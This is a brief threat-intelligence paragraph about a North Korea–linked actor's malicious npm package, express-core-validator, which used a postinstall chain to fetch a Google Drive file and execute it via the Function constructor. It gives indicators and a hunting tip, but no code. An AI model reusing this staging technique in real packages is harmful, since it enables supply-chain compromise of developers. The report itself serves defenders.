FAMOUS CHOLLIMA used express-core-validator v1.0.1, published by npm user crisdev09 on 20 February 2026, to test Google Drive as a stager in its Contagious Interview npm activity. The package’s postinstall chain loaded core.js, retrieved a Google Drive file by ID, and executed the downloaded JavaScript with the Function constructor. The staged file was named inject-simple.min0.js with SHA-256 2a7e7b76a3e8070410adce9b6a2b9cf112687922792c91be563c20fbf6a4a82f, and the same payload was also observed in a GitHub repository under frontend/public/images/splash.png. The shift to Google Drive is notable because the actor more commonly stages follow-on payloads on paste sites and developer platforms, making Node.js access to consumer storage providers a useful hunting signal.